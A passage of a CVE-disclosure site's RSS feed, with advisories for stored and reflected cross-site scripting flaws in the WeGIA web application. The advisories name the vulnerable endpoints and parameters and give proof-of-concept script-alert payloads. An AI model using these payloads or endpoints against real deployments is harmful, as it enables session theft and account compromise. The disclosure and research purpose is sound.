&amp;lt;/h2&amp;gt;&amp;lt;p style=&amp;#34;text-align: justify;&amp;#34;&amp;gt;A Stored Cross-Site Scripting (XSS) vulnerability was identified in the &amp;lt;code&amp;gt;control.php&amp;lt;/code&amp;gt; endpoint of the WeGIA application. This vulnerability allows attackers to inject malicious scripts into the &amp;lt;code&amp;gt;cargo&amp;lt;/code&amp;gt; parameter. The injected scripts are stored on the server and executed automatically whenever the affected page is accessed by users, posing a significant security risk.&amp;lt;/p&amp;gt;
&amp;lt;p&amp;gt;&amp;lt;a class=&amp;#34;link&amp;#34; href=&amp;#34;https://github.com/LabRedesCefetRJ/WeGIA/security&amp;#34;  target=&amp;#34;_blank&amp;#34; rel=&amp;#34;noopener&amp;#34;
    &amp;gt;https://github.com/LabRedesCefetRJ/WeGIA/security&amp;lt;/a&amp;gt;&amp;lt;/p&amp;gt;
&amp;lt;h2 id=&amp;#34;details&amp;#34;&amp;gt;Details
&amp;lt;/h2&amp;gt;&amp;lt;p&amp;gt;Vulnerable Endpoint: &amp;lt;code&amp;gt;POST /controle/control.php&amp;lt;/code&amp;gt;&amp;lt;/p&amp;gt;</description><content:encoded>&amp;lt;h2 id=&amp;#34;cve-2025-23037-cross-site-scripting-xss-stored-endpoint-controlphp-parameter-cargo&amp;#34;&amp;gt;CVE-2025-23037: Cross-Site Scripting (XSS) Stored endpoint &amp;lt;code&amp;gt;control.php&amp;lt;/code&amp;gt; parameter &amp;lt;code&amp;gt;cargo&amp;lt;/code&amp;gt;
&amp;lt;/h2&amp;gt;&amp;lt;blockquote&amp;gt;
&amp;lt;p&amp;gt;&amp;lt;em&amp;gt;CVE Publication: &amp;lt;a class=&amp;#34;link&amp;#34; href=&amp;#34;https://www.cve.org/CVERecord?id=CVE-2025-230337&amp;#34;  target=&amp;#34;_blank&amp;#34; rel=&amp;#34;noopener&amp;#34;
    &amp;gt;https://www.cve.org/CVERecord?id=CVE-2025-230337&amp;lt;/a&amp;gt;&amp;lt;/em&amp;gt;&amp;lt;/p&amp;gt;
&amp;lt;/blockquote&amp;gt;
&amp;lt;h2 id=&amp;#34;summary&amp;#34;&amp;gt;Summary
&amp;lt;/h2&amp;gt;&amp;lt;p style=&amp;#34;text-align: justify;&amp;#34;&amp;gt;A Stored Cross-Site Scripting (XSS) vulnerability was identified in the &amp;lt;code&amp;gt;control.php&amp;lt;/code&amp;gt; endpoint of the WeGIA application. This vulnerability allows attackers to inject malicious scripts into the &amp;lt;code&amp;gt;cargo&amp;lt;/code&amp;gt; parameter. The injected scripts are stored on the server and executed automatically whenever the affected page is accessed by users, posing a significant security risk.&amp;lt;/p&amp;gt;
&amp;lt;p&amp;gt;&amp;lt;a class=&amp;#34;link&amp;#34; href=&amp;#34;https://github.com/LabRedesCefetRJ/WeGIA/security&amp;#34;  target=&amp;#34;_blank&amp;#34; rel=&amp;#34;noopener&amp;#34;
    &amp;gt;https://github.com/LabRedesCefetRJ/WeGIA/security&amp;lt;/a&amp;gt;&amp;lt;/p&amp;gt;
&amp;lt;h2 id=&amp;#34;details&amp;#34;&amp;gt;Details
&amp;lt;/h2&amp;gt;&amp;lt;p&amp;gt;Vulnerable Endpoint: &amp;lt;code&amp;gt;POST /controle/control.php&amp;lt;/code&amp;gt;&amp;lt;/p&amp;gt;
&amp;lt;p&amp;gt;Parameter: &amp;lt;code&amp;gt;cargo&amp;lt;/code&amp;gt;&amp;lt;/p&amp;gt;
&amp;lt;p style=&amp;#34;text-align: justify;&amp;#34;&amp;gt;The application fails to properly validate and sanitize user inputs in the &amp;lt;code&amp;gt;control.php&amp;lt;/code&amp;gt; parameter. This lack of validation allows attackers to inject malicious scripts, which are then stored on the server. Whenever the affected page is accessed, the malicious payload is executed in the victim&amp;#39;s browser, potentially compromising the user&amp;#39;s data and system.&amp;lt;/p&amp;gt;
&amp;lt;h2 id=&amp;#34;poc&amp;#34;&amp;gt;POC
&amp;lt;/h2&amp;gt;&amp;lt;h3 id=&amp;#34;payload&amp;#34;&amp;gt;Payload:
&amp;lt;/h3&amp;gt;&amp;lt;div class=&amp;#34;highlight&amp;#34;&amp;gt;&amp;lt;div class=&amp;#34;chroma&amp;#34;&amp;gt;
&amp;lt;table class=&amp;#34;lntable&amp;#34;&amp;gt;&amp;lt;tr&amp;gt;&amp;lt;td class=&amp;#34;lntd&amp;#34;&amp;gt;
&amp;lt;pre tabindex=&amp;#34;0&amp;#34; class=&amp;#34;chroma&amp;#34;&amp;gt;&amp;lt;code&amp;gt;&amp;lt;span class=&amp;#34;lnt&amp;#34;&amp;gt;1
&amp;lt;/span&amp;gt;&amp;lt;/code&amp;gt;&amp;lt;/pre&amp;gt;&amp;lt;/td&amp;gt;
&amp;lt;td class=&amp;#34;lntd&amp;#34;&amp;gt;
&amp;lt;pre tabindex=&amp;#34;0&amp;#34; class=&amp;#34;chroma&amp;#34;&amp;gt;&amp;lt;code class=&amp;#34;language-javascript&amp;#34; data-lang=&amp;#34;javascript&amp;#34;&amp;gt;&amp;lt;span class=&amp;#34;line&amp;#34;&amp;gt;&amp;lt;span class=&amp;#34;cl&amp;#34;&amp;gt;  &amp;lt;span class=&amp;#34;o&amp;#34;&amp;gt;&amp;amp;lt;&amp;lt;/span&amp;gt;&amp;lt;span class=&amp;#34;nx&amp;#34;&amp;gt;script&amp;lt;/span&amp;gt;&amp;lt;span class=&amp;#34;o&amp;#34;&amp;gt;&amp;amp;gt;&amp;lt;/span&amp;gt;&amp;lt;span class=&amp;#34;nx&amp;#34;&amp;gt;alert&amp;lt;/span&amp;gt;&amp;lt;span class=&amp;#34;p&amp;#34;&amp;gt;(&amp;lt;/span&amp;gt;&amp;lt;span class=&amp;#34;mi&amp;#34;&amp;gt;8&amp;lt;/span&amp;gt;&amp;lt;span class=&amp;#34;p&amp;#34;&amp;gt;)&amp;lt;/span&amp;gt;&amp;lt;span class=&amp;#34;o&amp;#34;&amp;gt;&amp;amp;lt;&amp;lt;/span&amp;gt;&amp;lt;span class=&amp;#34;err&amp;#34;&amp;gt;/script&amp;amp;gt;&amp;lt;/span&amp;gt;
&amp;lt;/span&amp;gt;&amp;lt;/span&amp;gt;&amp;lt;/code&amp;gt;&amp;lt;/pre&amp;gt;&amp;lt;/td&amp;gt;&amp;lt;/tr&amp;gt;&amp;lt;/table&amp;gt;
&amp;lt;/div&amp;gt;
&amp;lt;/div&amp;gt;&amp;lt;p&amp;gt;&amp;lt;img src=&amp;#34;/p/cve-2025-23037/402376149-6493793e-324f-4905-bfe1-f3b4ee2c2f85.png&amp;#34;
	width=&amp;#34;805&amp;#34;
	height=&amp;#34;327&amp;#34;
	srcset=&amp;#34;/p/cve-2025-23037/402376149-6493793e-324f-4905-bfe1-f3b4ee2c2f85_hu_328ff5c457ca5e7d.png 480w, /p/cve-2025-23037/402376149-6493793e-324f-4905-bfe1-f3b4ee2c2f85_hu_6f47a1fbd76daf7.png 1024w&amp;#34;
	loading=&amp;#34;lazy&amp;#34;
	
	
		class=&amp;#34;gallery-image&amp;#34; 
		data-flex-grow=&amp;#34;246&amp;#34;
		data-flex-basis=&amp;#34;590px&amp;#34;
	
 /&amp;gt;&amp;lt;/p&amp;gt;
&amp;lt;p&amp;gt;&amp;lt;img src=&amp;#34;/p/cve-2025-23037/402376150-56dab48e-5331-4b98-9d04-ff0d7a4d8ab3.png&amp;#34;
	width=&amp;#34;807&amp;#34;
	height=&amp;#34;155&amp;#34;
	srcset=&amp;#34;/p/cve-2025-23037/402376150-56dab48e-5331-4b98-9d04-ff0d7a4d8ab3_hu_ab0ea3f50ed6054b.png 480w, /p/cve-2025-23037/402376150-56dab48e-5331-4b98-9d04-ff0d7a4d8ab3_hu_aec198605a17294a.png 1024w&amp;#34;
	loading=&amp;#34;lazy&amp;#34;
	
	
		class=&amp;#34;gallery-image&amp;#34; 
		data-flex-grow=&amp;#34;520&amp;#34;
		data-flex-basis=&amp;#34;1249px&amp;#34;
	
 /&amp;gt;&amp;lt;/p&amp;gt;
&amp;lt;h2 id=&amp;#34;impact&amp;#34;&amp;gt;Impact
&amp;lt;/h2&amp;gt;&amp;lt;p style=&amp;#34;text-align: justify;&amp;#34;&amp;gt;
  &amp;lt;ul&amp;gt;
    &amp;lt;li&amp;gt;Stealing session cookies: Attackers can use stolen session cookies to hijack a user&amp;#39;s session and perform actions on their behalf.&amp;lt;/li&amp;gt;
    &amp;lt;li&amp;gt;Downloading malware: Attackers can trick users into downloading and installing malware on their computers.&amp;lt;/li&amp;gt;
    &amp;lt;li&amp;gt;Hijacking browsers: Attackers can hijack a user&amp;#39;s browser or deliver browser-based exploits.&amp;lt;/li&amp;gt;
    &amp;lt;li&amp;gt;Stealing credentials: Attackers can steal a user&amp;#39;s credentials.&amp;lt;/li&amp;gt;
    &amp;lt;li&amp;gt;Obtaining sensitive information: Attackers can obtain sensitive information stored in a user&amp;#39;s account or in their browser.&amp;lt;/li&amp;gt;
    &amp;lt;li&amp;gt;Defacing websites: Attackers can deface a website by altering its content.&amp;lt;/li&amp;gt;
    &amp;lt;li&amp;gt;Misdirecting users: Attackers can change the instructions given to users who visit the target website, misdirecting their behavior.&amp;lt;/li&amp;gt;
    &amp;lt;li&amp;gt;Damaging a business&amp;#39;s reputation: Attackers can damage a business&amp;#39;s image or spread misinformation by defacing a corporate website.&amp;lt;/li&amp;gt;
  &amp;lt;/ul&amp;gt;
&amp;lt;/p&amp;gt;
&amp;lt;h2 id=&amp;#34;reference&amp;#34;&amp;gt;Reference
&amp;lt;/h2&amp;gt;&amp;lt;p&amp;gt;&amp;lt;a class=&amp;#34;link&amp;#34; href=&amp;#34;https://github.com/LabRedesCefetRJ/WeGIA/security/advisories/GHSA-rjjp-w2wm-7f9j&amp;#34;  target=&amp;#34;_blank&amp;#34; rel=&amp;#34;noopener&amp;#34;
    &amp;gt;https://github.com/LabRedesCefetRJ/WeGIA/security/advisories/GHSA-rjjp-w2wm-7f9j&amp;lt;/a&amp;gt;&amp;lt;/p&amp;gt;
&amp;lt;h2 id=&amp;#34;finder&amp;#34;&amp;gt;Finder
&amp;lt;/h2&amp;gt;&amp;lt;p&amp;gt;&amp;lt;a class=&amp;#34;link&amp;#34; href=&amp;#34;https://www.linkedin.com/in/elisangelasilvademendonca/&amp;#34;  target=&amp;#34;_blank&amp;#34; rel=&amp;#34;noopener&amp;#34;
    &amp;gt;&amp;lt;img src=&amp;#34;/assets/contributors/50x50/elisangela50x50.png&amp;#34;
	
	
	
	loading=&amp;#34;lazy&amp;#34;
	
	
 /&amp;gt;&amp;lt;/a&amp;gt; &amp;lt;a class=&amp;#34;link&amp;#34; href=&amp;#34;https://www.linkedin.com/in/elisangelasilvademendonca/&amp;#34;  target=&amp;#34;_blank&amp;#34; rel=&amp;#34;noopener&amp;#34;
    &amp;gt;Elisangela Mendonça&amp;lt;/a&amp;gt;&amp;lt;/p&amp;gt;
&amp;lt;h2 id=&amp;#34;contributors&amp;#34;&amp;gt;Contributors
&amp;lt;/h2&amp;gt;&amp;lt;p&amp;gt;&amp;lt;a class=&amp;#34;link&amp;#34; href=&amp;#34;https://www.linkedin.com/in/angelo-morette-019/&amp;#34;  target=&amp;#34;_blank&amp;#34; rel=&amp;#34;noopener&amp;#34;
    &amp;gt;&amp;lt;img src=&amp;#34;/assets/contributors/50x50/angelo50x50.png&amp;#34;
	
	
	
	loading=&amp;#34;lazy&amp;#34;
	
	
 /&amp;gt;&amp;lt;/a&amp;gt; &amp;lt;a class=&amp;#34;link&amp;#34; href=&amp;#34;https://www.linkedin.com/in/angelo-morette-019/&amp;#34;  target=&amp;#34;_blank&amp;#34; rel=&amp;#34;noopener&amp;#34;
    &amp;gt;Angelo Morette&amp;lt;/a&amp;gt;&amp;lt;/p&amp;gt;
&amp;lt;p&amp;gt;&amp;lt;a class=&amp;#34;link&amp;#34; href=&amp;#34;https://www.linkedin.com/in/nmmorette&amp;#34;  target=&amp;#34;_blank&amp;#34; rel=&amp;#34;noopener&amp;#34;
    &amp;gt;&amp;lt;img src=&amp;#34;/assets/contributors/50x50/natan50x50.png&amp;#34;
	
	
	
	loading=&amp;#34;lazy&amp;#34;
	
	
 /&amp;gt;&amp;lt;/a&amp;gt; &amp;lt;a class=&amp;#34;link&amp;#34; href=&amp;#34;https://www.linkedin.com/in/nmmorette&amp;#34;  target=&amp;#34;_blank&amp;#34; rel=&amp;#34;noopener&amp;#34;
    &amp;gt;Natan Maia Morette&amp;lt;/a&amp;gt;&amp;lt;/p&amp;gt;
&amp;lt;p&amp;gt;&amp;lt;a class=&amp;#34;link&amp;#34; href=&amp;#34;https://www.linkedin.com/in/rafael-corvino/&amp;#34;  target=&amp;#34;_blank&amp;#34; rel=&amp;#34;noopener&amp;#34;
    &amp;gt;&amp;lt;img src=&amp;#34;/assets/contributors/50x50/rafael50x50.png&amp;#34;
	
	
	
	loading=&amp;#34;lazy&amp;#34;
	
	
 /&amp;gt;&amp;lt;/a&amp;gt; &amp;lt;a class=&amp;#34;link&amp;#34; href=&amp;#34;https://www.linkedin.com/in/rafael-corvino/&amp;#34;  target=&amp;#34;_blank&amp;#34; rel=&amp;#34;noopener&amp;#34;
    &amp;gt;Rafael Corvino&amp;lt;/a&amp;gt;&amp;lt;/p&amp;gt;
&amp;lt;blockquote&amp;gt;
&amp;lt;p&amp;gt;&amp;lt;em&amp;gt;By: &amp;lt;a class=&amp;#34;link&amp;#34; href=&amp;#34;https://github.com/Sec-Dojo-Cyber-House/cve-hunters&amp;#34;  target=&amp;#34;_blank&amp;#34; rel=&amp;#34;noopener&amp;#34;
    &amp;gt;CVE-Hunters&amp;lt;/a&amp;gt;&amp;lt;/em&amp;gt;&amp;lt;/p&amp;gt;
&amp;lt;/blockquote&amp;gt;
</content:encoded>
        <pubDate>Mon, 13 Jan 2025 00:00:00 &#43;0000</pubDate>
      </item>
    
      <item>
        <title>CVE-2025-23038</title>
        <link>https://www.cvehunters.com/p/cve-2025-23038/</link>
        <guid>https://www.cvehunters.com/p/cve-2025-23038/</guid>
        <description>&amp;lt;h2 id=&amp;#34;cve-2025-23038-cross-site-scripting-xss-stored-endpoint-remuneracaophp-parameter-descricao&amp;#34;&amp;gt;CVE-2025-23038: Cross-Site Scripting (XSS) Stored endpoint &amp;lt;code&amp;gt;remuneracao.php&amp;lt;/code&amp;gt; parameter &amp;lt;code&amp;gt;descricao&amp;lt;/code&amp;gt;
&amp;lt;/h2&amp;gt;&amp;lt;blockquote&amp;gt;
&amp;lt;p&amp;gt;&amp;lt;em&amp;gt;CVE Publication: &amp;lt;a class=&amp;#34;link&amp;#34; href=&amp;#34;https://www.cve.org/CVERecord?id=CVE-2025-23038&amp;#34;  target=&amp;#34;_blank&amp;#34; rel=&amp;#34;noopener&amp;#34;
    &amp;gt;https://www.cve.org/CVERecord?id=CVE-2025-23038&amp;lt;/a&amp;gt;&amp;lt;/em&amp;gt;&amp;lt;/p&amp;gt;
&amp;lt;/blockquote&amp;gt;
&amp;lt;h2 id=&amp;#34;summary&amp;#34;&amp;gt;Summary
&amp;lt;/h2&amp;gt;&amp;lt;p style=&amp;#34;text-align: justify;&amp;#34;&amp;gt;A Stored Cross-Site Scripting (XSS) vulnerability was identified in the &amp;lt;code&amp;gt;remuneracao.php&amp;lt;/code&amp;gt; endpoint of the WeGIA application. This vulnerability allows attackers to inject malicious scripts into the &amp;lt;code&amp;gt;descricao&amp;lt;/code&amp;gt; parameter. The injected scripts are stored on the server and executed automatically whenever the affected page is accessed by users, posing a significant security risk.&amp;lt;/p&amp;gt;
&amp;lt;p&amp;gt;&amp;lt;a class=&amp;#34;link&amp;#34; href=&amp;#34;https://github.com/LabRedesCefetRJ/WeGIA/security&amp;#34;  target=&amp;#34;_blank&amp;#34; rel=&amp;#34;noopener&amp;#34;
    &amp;gt;https://github.com/LabRedesCefetRJ/WeGIA/security&amp;lt;/a&amp;gt;&amp;lt;/p&amp;gt;
&amp;lt;h2 id=&amp;#34;details&amp;#34;&amp;gt;Details
&amp;lt;/h2&amp;gt;&amp;lt;p&amp;gt;Vulnerable Endpoint: &amp;lt;code&amp;gt;POST /html/funcionario/remuneracao.php&amp;lt;/code&amp;gt;&amp;lt;/p&amp;gt;</description><content:encoded>&amp;lt;h2 id=&amp;#34;cve-2025-23038-cross-site-scripting-xss-stored-endpoint-remuneracaophp-parameter-descricao&amp;#34;&amp;gt;CVE-2025-23038: Cross-Site Scripting (XSS) Stored endpoint &amp;lt;code&amp;gt;remuneracao.php&amp;lt;/code&amp;gt; parameter &amp;lt;code&amp;gt;descricao&amp;lt;/code&amp;gt;
&amp;lt;/h2&amp;gt;&amp;lt;blockquote&amp;gt;
&amp;lt;p&amp;gt;&amp;lt;em&amp;gt;CVE Publication: &amp;lt;a class=&amp;#34;link&amp;#34; href=&amp;#34;https://www.cve.org/CVERecord?id=CVE-2025-23038&amp;#34;  target=&amp;#34;_blank&amp;#34; rel=&amp;#34;noopener&amp;#34;
    &amp;gt;https://www.cve.org/CVERecord?id=CVE-2025-23038&amp;lt;/a&amp;gt;&amp;lt;/em&amp;gt;&amp;lt;/p&amp;gt;
&amp;lt;/blockquote&amp;gt;
&amp;lt;h2 id=&amp;#34;summary&amp;#34;&amp;gt;Summary
&amp;lt;/h2&amp;gt;&amp;lt;p style=&amp;#34;text-align: justify;&amp;#34;&amp;gt;A Stored Cross-Site Scripting (XSS) vulnerability was identified in the &amp;lt;code&amp;gt;remuneracao.php&amp;lt;/code&amp;gt; endpoint of the WeGIA application. This vulnerability allows attackers to inject malicious scripts into the &amp;lt;code&amp;gt;descricao&amp;lt;/code&amp;gt; parameter. The injected scripts are stored on the server and executed automatically whenever the affected page is accessed by users, posing a significant security risk.&amp;lt;/p&amp;gt;
&amp;lt;p&amp;gt;&amp;lt;a class=&amp;#34;link&amp;#34; href=&amp;#34;https://github.com/LabRedesCefetRJ/WeGIA/security&amp;#34;  target=&amp;#34;_blank&amp;#34; rel=&amp;#34;noopener&amp;#34;
    &amp;gt;https://github.com/LabRedesCefetRJ/WeGIA/security&amp;lt;/a&amp;gt;&amp;lt;/p&amp;gt;
&amp;lt;h2 id=&amp;#34;details&amp;#34;&amp;gt;Details
&amp;lt;/h2&amp;gt;&amp;lt;p&amp;gt;Vulnerable Endpoint: &amp;lt;code&amp;gt;POST /html/funcionario/remuneracao.php&amp;lt;/code&amp;gt;&amp;lt;/p&amp;gt;
&amp;lt;p&amp;gt;Parameter: &amp;lt;code&amp;gt;descricao&amp;lt;/code&amp;gt;&amp;lt;/p&amp;gt;
&amp;lt;p style=&amp;#34;text-align: justify;&amp;#34;&amp;gt;The application fails to properly validate and sanitize user inputs in the &amp;lt;code&amp;gt;remuneracao.php&amp;lt;/code&amp;gt; parameter. This lack of validation allows attackers to inject malicious scripts, which are then stored on the server. Whenever the affected page is accessed, the malicious payload is executed in the victim&amp;#39;s browser, potentially compromising the user&amp;#39;s data and system.&amp;lt;/p&amp;gt;
&amp;lt;h2 id=&amp;#34;poc&amp;#34;&amp;gt;POC
&amp;lt;/h2&amp;gt;&amp;lt;h3 id=&amp;#34;payload&amp;#34;&amp;gt;Payload:
&amp;lt;/h3&amp;gt;&amp;lt;div class=&amp;#34;highlight&amp;#34;&amp;gt;&amp;lt;div class=&amp;#34;chroma&amp;#34;&amp;gt;
&amp;lt;table class=&amp;#34;lntable&amp;#34;&amp;gt;&amp;lt;tr&amp;gt;&amp;lt;td class=&amp;#34;lntd&amp;#34;&amp;gt;
&amp;lt;pre tabindex=&amp;#34;0&amp;#34; class=&amp;#34;chroma&amp;#34;&amp;gt;&amp;lt;code&amp;gt;&amp;lt;span class=&amp;#34;lnt&amp;#34;&amp;gt;1
&amp;lt;/span&amp;gt;&amp;lt;/code&amp;gt;&amp;lt;/pre&amp;gt;&amp;lt;/td&amp;gt;
&amp;lt;td class=&amp;#34;lntd&amp;#34;&amp;gt;
&amp;lt;pre tabindex=&amp;#34;0&amp;#34; class=&amp;#34;chroma&amp;#34;&amp;gt;&amp;lt;code class=&amp;#34;language-javascript&amp;#34; data-lang=&amp;#34;javascript&amp;#34;&amp;gt;&amp;lt;span class=&amp;#34;line&amp;#34;&amp;gt;&amp;lt;span class=&amp;#34;cl&amp;#34;&amp;gt;  &amp;lt;span class=&amp;#34;o&amp;#34;&amp;gt;&amp;amp;lt;&amp;lt;/span&amp;gt;&amp;lt;span class=&amp;#34;nx&amp;#34;&amp;gt;script&amp;lt;/span&amp;gt;&amp;lt;span class=&amp;#34;o&amp;#34;&amp;gt;&amp;amp;gt;&amp;lt;/span&amp;gt;&amp;lt;span class=&amp;#34;nx&amp;#34;&amp;gt;alert&amp;lt;/span&amp;gt;&amp;lt;span class=&amp;#34;p&amp;#34;&amp;gt;(&amp;lt;/span&amp;gt;&amp;lt;span class=&amp;#34;mi&amp;#34;&amp;gt;10&amp;lt;/span&amp;gt;&amp;lt;span class=&amp;#34;p&amp;#34;&amp;gt;)&amp;lt;/span&amp;gt;&amp;lt;span class=&amp;#34;o&amp;#34;&amp;gt;&amp;amp;lt;&amp;lt;/span&amp;gt;&amp;lt;span class=&amp;#34;err&amp;#34;&amp;gt;/script&amp;amp;gt;&amp;lt;/span&amp;gt;
&amp;lt;/span&amp;gt;&amp;lt;/span&amp;gt;&amp;lt;/code&amp;gt;&amp;lt;/pre&amp;gt;&amp;lt;/td&amp;gt;&amp;lt;/tr&amp;gt;&amp;lt;/table&amp;gt;
&amp;lt;/div&amp;gt;
&amp;lt;/div&amp;gt;&amp;lt;p&amp;gt;&amp;lt;img src=&amp;#34;/p/cve-2025-23038/402082629-19df5910-44fb-4b1d-9fe9-fc63e519b5c1.png&amp;#34;
	width=&amp;#34;806&amp;#34;
	height=&amp;#34;305&amp;#34;
	srcset=&amp;#34;/p/cve-2025-23038/402082629-19df5910-44fb-4b1d-9fe9-fc63e519b5c1_hu_6f4bc7bc7396ab64.png 480w, /p/cve-2025-23038/402082629-19df5910-44fb-4b1d-9fe9-fc63e519b5c1_hu_154c335fc06f8a46.png 1024w&amp;#34;
	loading=&amp;#34;lazy&amp;#34;
	
	
		class=&amp;#34;gallery-image&amp;#34; 
		data-flex-grow=&amp;#34;264&amp;#34;
		data-flex-basis=&amp;#34;634px&amp;#34;
	
 /&amp;gt;&amp;lt;/p&amp;gt;
&amp;lt;p&amp;gt;&amp;lt;img src=&amp;#34;/p/cve-2025-23038/402082637-ee630620-6954-40b1-94cb-6bff9398a889.png&amp;#34;
	width=&amp;#34;806&amp;#34;
	height=&amp;#34;179&amp;#34;
	srcset=&amp;#34;/p/cve-2025-23038/402082637-ee630620-6954-40b1-94cb-6bff9398a889_hu_d35958348c77a2c7.png 480w, /p/cve-2025-23038/402082637-ee630620-6954-40b1-94cb-6bff9398a889_hu_37304eb15af644d6.png 1024w&amp;#34;
	loading=&amp;#34;lazy&amp;#34;
	
	
		class=&amp;#34;gallery-image&amp;#34; 
		data-flex-grow=&amp;#34;450&amp;#34;
		data-flex-basis=&amp;#34;1080px&amp;#34;
	
 /&amp;gt;&amp;lt;/p&amp;gt;
&amp;lt;h2 id=&amp;#34;impact&amp;#34;&amp;gt;Impact
&amp;lt;/h2&amp;gt;&amp;lt;p style=&amp;#34;text-align: justify;&amp;#34;&amp;gt;
  &amp;lt;ul&amp;gt;
    &amp;lt;li&amp;gt;Stealing session cookies: Attackers can use stolen session cookies to hijack a user&amp;#39;s session and perform actions on their behalf.&amp;lt;/li&amp;gt;
    &amp;lt;li&amp;gt;Downloading malware: Attackers can trick users into downloading and installing malware on their computers.&amp;lt;/li&amp;gt;
    &amp;lt;li&amp;gt;Hijacking browsers: Attackers can hijack a user&amp;#39;s browser or deliver browser-based exploits.&amp;lt;/li&amp;gt;
    &amp;lt;li&amp;gt;Stealing credentials: Attackers can steal a user&amp;#39;s credentials.&amp;lt;/li&amp;gt;
    &amp;lt;li&amp;gt;Obtaining sensitive information: Attackers can obtain sensitive information stored in a user&amp;#39;s account or in their browser.&amp;lt;/li&amp;gt;
    &amp;lt;li&amp;gt;Defacing websites: Attackers can deface a website by altering its content.&amp;lt;/li&amp;gt;
    &amp;lt;li&amp;gt;Misdirecting users: Attackers can change the instructions given to users who visit the target website, misdirecting their behavior.&amp;lt;/li&amp;gt;
    &amp;lt;li&amp;gt;Damaging a business&amp;#39;s reputation: Attackers can damage a business&amp;#39;s image or spread misinformation by defacing a corporate website.&amp;lt;/li&amp;gt;
  &amp;lt;/ul&amp;gt;
&amp;lt;/p&amp;gt;
&amp;lt;h2 id=&amp;#34;reference&amp;#34;&amp;gt;Reference
&amp;lt;/h2&amp;gt;&amp;lt;p&amp;gt;&amp;lt;a class=&amp;#34;link&amp;#34; href=&amp;#34;https://github.com/LabRedesCefetRJ/WeGIA/security/advisories/GHSA-rp2v-7hpw-m6qc&amp;#34;  target=&amp;#34;_blank&amp;#34; rel=&amp;#34;noopener&amp;#34;
    &amp;gt;https://github.com/LabRedesCefetRJ/WeGIA/security/advisories/GHSA-rp2v-7hpw-m6qc&amp;lt;/a&amp;gt;&amp;lt;/p&amp;gt;
&amp;lt;h2 id=&amp;#34;finder&amp;#34;&amp;gt;Finder
&amp;lt;/h2&amp;gt;&amp;lt;p&amp;gt;&amp;lt;a class=&amp;#34;link&amp;#34; href=&amp;#34;https://www.linkedin.com/in/elisangelasilvademendonca/&amp;#34;  target=&amp;#34;_blank&amp;#34; rel=&amp;#34;noopener&amp;#34;
    &amp;gt;&amp;lt;img src=&amp;#34;/assets/contributors/50x50/elisangela50x50.png&amp;#34;
	
	
	
	loading=&amp;#34;lazy&amp;#34;
	
	
 /&amp;gt;&amp;lt;/a&amp;gt; &amp;lt;a class=&amp;#34;link&amp;#34; href=&amp;#34;https://www.linkedin.com/in/elisangelasilvademendonca/&amp;#34;  target=&amp;#34;_blank&amp;#34; rel=&amp;#34;noopener&amp;#34;
    &amp;gt;Elisangela Mendonça&amp;lt;/a&amp;gt;&amp;lt;/p&amp;gt;
&amp;lt;h2 id=&amp;#34;contributors&amp;#34;&amp;gt;Contributors
&amp;lt;/h2&amp;gt;&amp;lt;p&amp;gt;&amp;lt;a class=&amp;#34;link&amp;#34; href=&amp;#34;https://www.linkedin.com/in/diegocbcastro/&amp;#34;  target=&amp;#34;_blank&amp;#34; rel=&amp;#34;noopener&amp;#34;
    &amp;gt;&amp;lt;img src=&amp;#34;/assets/contributors/50x50/diego50x50.png&amp;#34;
	
	
	
	loading=&amp;#34;lazy&amp;#34;
	
	
 /&amp;gt;&amp;lt;/a&amp;gt; &amp;lt;a class=&amp;#34;link&amp;#34; href=&amp;#34;https://www.linkedin.com/in/diegocbcastro/&amp;#34;  target=&amp;#34;_blank&amp;#34; rel=&amp;#34;noopener&amp;#34;
    &amp;gt;Diego Castro&amp;lt;/a&amp;gt;&amp;lt;/p&amp;gt;
&amp;lt;p&amp;gt;&amp;lt;a class=&amp;#34;link&amp;#34; href=&amp;#34;https://www.linkedin.com/in/nmmorette&amp;#34;  target=&amp;#34;_blank&amp;#34; rel=&amp;#34;noopener&amp;#34;
    &amp;gt;&amp;lt;img src=&amp;#34;/assets/contributors/50x50/natan50x50.png&amp;#34;
	
	
	
	loading=&amp;#34;lazy&amp;#34;
	
	
 /&amp;gt;&amp;lt;/a&amp;gt; &amp;lt;a class=&amp;#34;link&amp;#34; href=&amp;#34;https://www.linkedin.com/in/nmmorette&amp;#34;  target=&amp;#34;_blank&amp;#34; rel=&amp;#34;noopener&amp;#34;
    &amp;gt;Natan Maia Morette&amp;lt;/a&amp;gt;&amp;lt;/p&amp;gt;
&amp;lt;p&amp;gt;&amp;lt;a class=&amp;#34;link&amp;#34; href=&amp;#34;https://www.linkedin.com/in/rafael-corvino/&amp;#34;  target=&amp;#34;_blank&amp;#34; rel=&amp;#34;noopener&amp;#34;
    &amp;gt;&amp;lt;img src=&amp;#34;/assets/contributors/50x50/rafael50x50.png&amp;#34;
	
	
	
	loading=&amp;#34;lazy&amp;#34;
	
	
 /&amp;gt;&amp;lt;/a&amp;gt; &amp;lt;a class=&amp;#34;link&amp;#34; href=&amp;#34;https://www.linkedin.com/in/rafael-corvino/&amp;#34;  target=&amp;#34;_blank&amp;#34; rel=&amp;#34;noopener&amp;#34;
    &amp;gt;Rafael Corvino&amp;lt;/a&amp;gt;&amp;lt;/p&amp;gt;
&amp;lt;blockquote&amp;gt;
&amp;lt;p&amp;gt;&amp;lt;em&amp;gt;By: &amp;lt;a class=&amp;#34;link&amp;#34; href=&amp;#34;https://github.com/Sec-Dojo-Cyber-House/cve-hunters&amp;#34;  target=&amp;#34;_blank&amp;#34; rel=&amp;#34;noopener&amp;#34;
    &amp;gt;CVE-Hunters&amp;lt;/a&amp;gt;&amp;lt;/em&amp;gt;&amp;lt;/p&amp;gt;
&amp;lt;/blockquote&amp;gt;
</content:encoded>
        <pubDate>Mon, 13 Jan 2025 00:00:00 &#43;0000</pubDate>
      </item>
    
      <item>
        <title>CVE-2025-22596</title>
        <link>https://www.cvehunters.com/p/cve-2025-22596/</link>
        <guid>https://www.cvehunters.com/p/cve-2025-22596/</guid>
        <description>&amp;lt;h2 id=&amp;#34;cve-2025-22596-cross-site-scripting-xss-reflected-endpoint-modulos_visiveisphp-parameter-msg_c&amp;#34;&amp;gt;CVE-2025-22596: Cross-Site Scripting (XSS) Reflected endpoint &amp;lt;code&amp;gt;modulos_visiveis.php&amp;lt;/code&amp;gt; parameter &amp;lt;code&amp;gt;msg_c&amp;lt;/code&amp;gt;
&amp;lt;/h2&amp;gt;&amp;lt;blockquote&amp;gt;
